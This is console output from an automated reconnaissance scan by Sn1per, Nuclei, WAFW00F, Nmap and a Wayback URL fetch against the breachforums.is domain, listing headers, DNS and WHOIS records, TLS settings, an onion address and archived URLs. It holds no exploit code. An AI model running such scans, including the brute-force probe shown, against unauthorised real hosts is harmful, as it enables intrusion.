P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], http://breachforums.is:80/                     
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], http://breachforums.is:8080                     
P5 - INFO, Robots.txt Detected,http://breachforums.is:8080/robots.txt,Sitemap: https://breachforums.is/sitemap-index.xml
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], http://breachforums.is:80/                     
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], http://breachforums.is:8080                     
====================================================================================•x[2023-09-17](20:46)x•
 RUNNING SC0PE NETWORK VULNERABILITY SCAN 
====================================================================================•x[2023-09-17](20:46)x•
P5 - INFO, Interesting Ports Found, breachforums.is, 8080 
====================================================================================•x[2023-09-17](20:46)x•
====================================================================================•x[2023-09-17](20:46)x•
====================================================================================
•?((¯°·..• Sc0pe Vulnerability Report by @xer0dayz •._.·°¯))؟• 
====================================================================================
Critical: 0
High: 0
Medium: 0
Low: 0
Info: 25
Score: 25
====================================================================================
P5 - INFO, Interesting Ports Found, breachforums.is, 8080 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], http://breachforums.is:80/                     
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], http://breachforums.is:8080                     
P5 - INFO, Robots.txt Detected,http://breachforums.is:80/robots.txt,Sitemap: https://breachforums.is/sitemap-index.xml
P5 - INFO, Robots.txt Detected,http://breachforums.is:8080/robots.txt,Sitemap: https://breachforums.is/sitemap-index.xml
P5 - INFO, Server Header Disclosure - HTTP, http://breachforums.is:8080//, Server: cloudflare
====================================================================================
====================================================================================•x[2023-09-17](20:46)x•
 SCAN COMPLETE! 
====================================================================================•x[2023-09-17](20:46)x•
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

[*] Opening loot directory /usr/share/sniper/loot/workspace/https:--breachforums.is [OK]
 + -- --=[ Generating reports...
[||]
 + -- --=[ Sorting all files...
 + -- --=[ Removing blank screenshots and files... 
 + -- --=[ Done!
====================================================================================•x[2023-09-17](20:46)x•
 SCANNING ALL HTTPS PORTS 
====================================================================================•x[2023-09-17](20:46)x•
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/https:--breachforums.is [OK]
[*] Scanning breachforums.is [OK]
[*] Checking for active internet connection [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/https:--breachforums.is [OK]
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/https:--breachforums.is [OK]
[*] Scanning breachforums.is [OK]
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[https://sn1persecurity.com
 + -- --=[Sn1per v9.2 by @xer0dayz                                                                                  
                                                                                                                    
                                                                                                                    
               ;               ,                                                                                    
             ,;                 '.                                                                                  
            ;:                   :;                                                                                 
           ::                     ::                                                                                
           ::                     ::                                                                                
           ':                     :                                                                                 
            :.                    :                                                                                 
         ;' ::                   ::  '                                                                              
        .'  ';                   ;'  '.                                                                             
       ::    :;                 ;:    ::                                                                            
       ;      :;.             ,;:     ::                                                                            
       :;      :;:           ,;"      ::                                                                            
       ::.      ':;  ..,.;  ;:'     ,.;:                                                                            
        "'"...   '::,::::: ;:   .;.;""'                                                                             
            '"""....;:::::;,;.;"""                                                                                  
        .:::.....'"':::::::'",...;::::;.                                                                            
       ;:' '""'"";.,;:::::;.'""""""  ':;                                                                            
      ::'         ;::;:::;::..         :;                                                                           
     ::         ,;:::::::::::;:..       ::                                                                          
     ;'     ,;;:;::::::::::::::;";..    ':.                                                                         
    ::     ;:"  ::::::"""'::::::  ":     ::                                                                         
     :.    ::   ::::::;  :::::::   :     ;                                                                          
      ;    ::   :::::::  :::::::   :    ;                                                                           
       '   ::   ::::::....:::::'  ,:   '                                                                            
        '  ::    :::::::::::::"   ::                                                                                
           ::     ':::::::::"'    ::                                                                                
           ':       """""""'      ::                                                                                
            ::                   ;:                                                                                 
            ':;                 ;:"                                                                                 
    -hrr-     ';              ,;'                                                                                   
                "'           '"                                                                                     
                  ''''                                                                                              

====================================================================================•x[2023-09-17](20:47)x•
 RUNNING TCP PORT SCAN 
====================================================================================•x[2023-09-17](20:47)x•
 + -- --=[Port 443 opened... running tests...
====================================================================================•x[2023-09-17](20:47)x•
 CHECKING HTTP HEADERS AND METHODS 
====================================================================================•x[2023-09-17](20:47)x•
HTTP/2 403 
date: Mon, 18 Sep 2023 03:47:08 GMT
content-type: text/html
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 80869b151c5d100c-LAX

HTTP/2 403 
date: Mon, 18 Sep 2023 03:47:08 GMT
content-type: text/html
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 80869b199ccf7eab-LAX

====================================================================================•x[2023-09-17](20:47)x•
 GATHERING WEB FINGERPRINT 
====================================================================================•x[2023-09-17](20:47)x•
 onion-location: http://breachedu76kdyavc6szj6ppbplfqoz3pgrk3zw57my4vybgblpfeayd.onion
 CF-Cache-Status: DYNAMIC
 Server: cloudflare
 CF-RAY: 80869b241a8a7e77-LAX
====================================================================================•x[2023-09-17](20:47)x•
 DISPLAYING META GENERATOR TAGS 
====================================================================================•x[2023-09-17](20:47)x•
====================================================================================•x[2023-09-17](20:47)x•
 DISPLAYING COMMENTS 
====================================================================================•x[2023-09-17](20:47)x•
====================================================================================•x[2023-09-17](20:47)x•
 DISPLAYING SITE LINKS 
====================================================================================•x[2023-09-17](20:47)x•
====================================================================================•x[2023-09-17](20:47)x•
 CHECKING FOR WAF 
====================================================================================•x[2023-09-17](20:47)x•

                   ______
                  /      \                                                                                          
                 (  Woof! )                                                                                         
                  \  ____/                      )                                                                   
                  ,,                           ) (_                                                                 
             .-. -    _______                 ( |__|                                                                
            ()``; |==|_______)                .)|__|                                                                
            / ('        /|\                  (  |__|                                                                
        (  /  )        / | \                  . |__|                                                                
         \(_)_))      /  |  \                   |__|                                                                

                    ~ WAFW00F : v2.2.0 ~
    The Web Application Firewall Fingerprinting Toolkit                                                             
                                                                                                                    
[*] Checking https://breachforums.is
[+] The site https://breachforums.is is behind Cloudflare (Cloudflare Inc.) WAF.
[~] Number of requests: 2

====================================================================================•x[2023-09-17](20:47)x•
 GATHERING HTTP INFO 
====================================================================================•x[2023-09-17](20:47)x•
https://breachforums.is:443 [403 Forbidden] Country[UNITED STATES][US], HTTPServer[cloudflare], IP[104.22.51.133], Title[403 Forbidden], UncommonHeaders[cf-cache-status,cf-ray]

====================================================================================•x[2023-09-17](20:47)x•
 GATHERING SSL/TLS INFO 
====================================================================================•x[2023-09-17](20:47)x•
Version: 2.1.0-static
OpenSSL 3.0.10 1 Aug 2023

Connected to 172.67.5.22

Testing SSL server breachforums.is on port 443 using SNI name breachforums.is

  SSL/TLS Protocols:
SSLv2     disabled
SSLv3     disabled
TLSv1.0   enabled
TLSv1.1   enabled
TLSv1.2   enabled
TLSv1.3   enabled

  TLS Fallback SCSV:
Server supports TLS Fallback SCSV

  TLS renegotiation:
Secure session renegotiation supported

  TLS Compression:
Compression disabled

  Heartbleed:
TLSv1.3 not vulnerable to heartbleed
TLSv1.2 not vulnerable to heartbleed
TLSv1.1 not vulnerable to heartbleed
TLSv1.0 not vulnerable to heartbleed

  Supported Server Cipher(s):
Preferred TLSv1.3  128 bits  TLS_AES_128_GCM_SHA256        Curve 25519 DHE 253
Accepted  TLSv1.3  256 bits  TLS_AES_256_GCM_SHA384        Curve 25519 DHE 253
Accepted  TLSv1.3  256 bits  TLS_CHACHA20_POLY1305_SHA256  Curve 25519 DHE 253
Preferred TLSv1.2  256 bits  ECDHE-RSA-CHACHA20-POLY1305   Curve 25519 DHE 253
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve 25519 DHE 253
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve 25519 DHE 253
Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256            
Accepted  TLSv1.2  128 bits  AES128-SHA                   
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve 25519 DHE 253
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve 25519 DHE 253
Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384            
Accepted  TLSv1.2  256 bits  AES256-SHA                   
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve 25519 DHE 253
Accepted  TLSv1.2  128 bits  AES128-SHA256                
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve 25519 DHE 253
Accepted  TLSv1.2  256 bits  AES256-SHA256                
Preferred TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve 25519 DHE 253
Accepted  TLSv1.1  128 bits  AES128-SHA                   
Accepted  TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve 25519 DHE 253
Accepted  TLSv1.1  256 bits  AES256-SHA                   
Preferred TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve 25519 DHE 253
Accepted  TLSv1.0  128 bits  AES128-SHA                   
Accepted  TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve 25519 DHE 253
Accepted  TLSv1.0  256 bits  AES256-SHA                   
Accepted  TLSv1.0  112 bits  DES-CBC3-SHA                 

  Server Key Exchange Group(s):
TLSv1.3  128 bits  secp256r1 (NIST P-256)
TLSv1.3  192 bits  secp384r1 (NIST P-384)
TLSv1.3  260 bits  secp521r1 (NIST P-521)
TLSv1.3  128 bits  x25519
TLSv1.2  128 bits  secp256r1 (NIST P-256)
TLSv1.2  192 bits  secp384r1 (NIST P-384)
TLSv1.2  260 bits  secp521r1 (NIST P-521)
TLSv1.2  128 bits  x25519

  SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength:    2048

Subject:  breachforums.is
Altnames: DNS:breachforums.is, DNS:*.breachforums.is
Issuer:   GTS CA 1P5

Not valid before: Jul 21 09:34:45 2023 GMT
Not valid after:  Oct 19 09:34:44 2023 GMT

====================================================================================•x[2023-09-17](20:47)x•
 CHECKING FOR INSECURE SSL/TLS CONFIGURATIONS 
====================================================================================•x[2023-09-17](20:47)x•
====================================================================================•x[2023-09-17](20:47)x•
 SAVING SCREENSHOTS 
====================================================================================•x[2023-09-17](20:47)x•
webscreenshot.py version 2.2.1

[+] 1 URLs to be screenshot
[+] 1 actual URLs screenshot
[+] 0 error(s)
====================================================================================•x[2023-09-17](20:47)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2023-09-17](20:47)x•
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 20:47 PDT
NSE: Loaded 51 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:47
Completed NSE at 20:47, 0.00s elapsed
Initiating NSE at 20:47
Completed NSE at 20:47, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 20:47
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Host Discovery
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Completed Parallel DNS resolution of 1 host. at 20:47, 0.05s elapsed
Initiating SYN Stealth Scan at 20:47
Scanning breachforums.is (172.67.5.22) [1 port]
Discovered open port 443/tcp on 172.67.5.22
Completed SYN Stealth Scan at 20:47, 0.06s elapsed (1 total ports)
Initiating Service scan at 20:47
Scanning 1 service on breachforums.is (172.67.5.22)
Completed Service scan at 20:47, 12.25s elapsed (1 service on 1 host)
NSE: Script scanning 172.67.5.22.
Initiating NSE at 20:47
Completed NSE at 20:47, 7.47s elapsed
Initiating NSE at 20:47
Completed NSE at 20:47, 0.62s elapsed
Nmap scan report for breachforums.is (172.67.5.22)
Host is up (0.041s latency).
Other addresses for breachforums.is (not scanned): 104.22.50.133 104.22.51.133 2606:4700:10::6816:3385 2606:4700:10::ac43:516 2606:4700:10::6816:3285

PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Cloudflare http proxy
|_http-server-header: cloudflare
| http-brute:   
|_  Path "/" does not require authentication

NSE: Script Post-scanning.
Initiating NSE at 20:47
Completed NSE at 20:47, 0.00s elapsed
Initiating NSE at 20:47
Completed NSE at 20:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.78 seconds
           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
====================================================================================•x[2023-09-17](20:47)x•
 RUNNING PASSIVE WEB SPIDER 
====================================================================================•x[2023-09-17](20:47)x•
parse error: Invalid numeric literal at line 1, column 7
====================================================================================•x[2023-09-17](20:48)x•
 FETCHING WAYBACK MACHINE URLS 
====================================================================================•x[2023-09-17](20:48)x•
http://breachforums.is/
https://breachforums.is/.well-known/ai-plugin.json
https://breachforums.is/.well-known/assetlinks.json
https://breachforums.is/.well-known/dnt-policy.txt
https://breachforums.is/.well-known/gpc.json
https://breachforums.is/.well-known/nodeinfo
https://breachforums.is/.well-known/openid-configuration
https://breachforums.is/.well-known/security.txt
https://breachforums.is/.well-known/trust.txt
https://breachforums.is/?__cf_chl_tk=3WkbHpWJDB1ImnWz3hxOIxYQjFKmHksDosU7ECIyP5s-1692197194-0-gaNycGzNC1A
https://breachforums.is/ads.txt
https://breachforums.is/alerts.php?modal=1
https://breachforums.is/Announcement-Database-Index
https://breachforums.is/Announcement-Leak-Section-Rules
https://breachforums.is/Announcement-Marketplace-Section-Rules
https://breachforums.is/Announcement-Official-Forum-Middlemen-Services
https://breachforums.is/app-ads.txt
https://breachforums.is/attachment.php
https://breachforums.is/awards
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
https://breachforums.is/bans
https://breachforums.is/cache/themes/theme1/latestposts.min.css
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1694000093
https://breachforums.is/cache/themes/theme1/showthread.min.css
https://breachforums.is/cache/themes/theme1/showthread.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/showthread.min.css?t=1694000093
https://breachforums.is/cache/themes/theme1/usercp.min.css
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/alerts.min.css
https://breachforums.is/cache/themes/theme3/alerts.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/alerts.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/all.min.min.css
https://breachforums.is/cache/themes/theme3/all.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/all.min.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/css3.min.css
https://breachforums.is/cache/themes/theme3/css3.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/css3.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/custom.min.css
https://breachforums.is/cache/themes/theme3/custom.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/custom.min.css?t=1690800105
https://breachforums.is/cache/themes/theme3/custom.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/ficons.min.css
https://breachforums.is/cache/themes/theme3/ficons.min.css?t=1687828213
https://breachforums.is/cache/themes/theme3/ficons.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/fork-awesome.min.css
https://breachforums.is/cache/themes/theme3/fork-awesome.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/fork-awesome.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/global.min.css
https://breachforums.is/cache/themes/theme3/global.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/global.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/hovercards.min.css
https://breachforums.is/cache/themes/theme3/hovercards.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/hovercards.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/lib.min.min.css
https://breachforums.is/cache/themes/theme3/lib.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/lib.min.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/mobile.min.css
https://breachforums.is/cache/themes/theme3/mobile.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/mobile.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/modcp.min.css
https://breachforums.is/cache/themes/theme3/modcp.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/normalize.min.min.css
https://breachforums.is/cache/themes/theme3/normalize.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/normalize.min.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/plugins.min.css
https://breachforums.is/cache/themes/theme3/plugins.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/plugins.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/roboto.min.css
https://breachforums.is/cache/themes/theme3/roboto.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/roboto.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/star_ratings.min.css
